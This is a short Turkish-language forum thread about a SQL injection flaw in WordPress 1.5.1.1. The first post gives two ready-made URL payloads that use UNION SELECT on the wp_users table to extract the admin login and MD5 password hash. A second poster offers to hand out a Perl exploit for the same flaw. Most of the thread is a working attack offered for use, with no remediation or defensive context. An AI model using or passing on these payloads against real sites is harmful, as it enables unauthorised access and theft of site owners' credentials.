WordPress 1.5.1.1 SQL Injection

[Cypherpunk]

WordPress Blog scriptinin 1.5.1.1 versiyonunda (son versiyon 1.5.1.2) yapılandırma yanlışlığında doğan SQL Injection açıkları mevcuttur.
Bu açık kullanılarak Blog Admininin kullanıcı adı ve şifresinin md5 hashine ulaşmak mümkün.

Örnek Kullanım:

QUOTE:
index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58 ),user_pass,CHAR(58 ),user_login,CHAR(58 ))%20FROM%20wp_users/*

QUOTE:
index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58 ),user_pass,CHAR(58 ),user_login,CHAR(58 )),null,null,null%20FROM%20wp_users/**

Not : Boşluklar yok.

[Alıntıdır]

 

[OuTLaWsys]

evet ben bu açıktan bahsetmiştim başka bir forumda hatta exploiti de var perl altında çalışan isteyenler varsa verebilirim kolay gelsin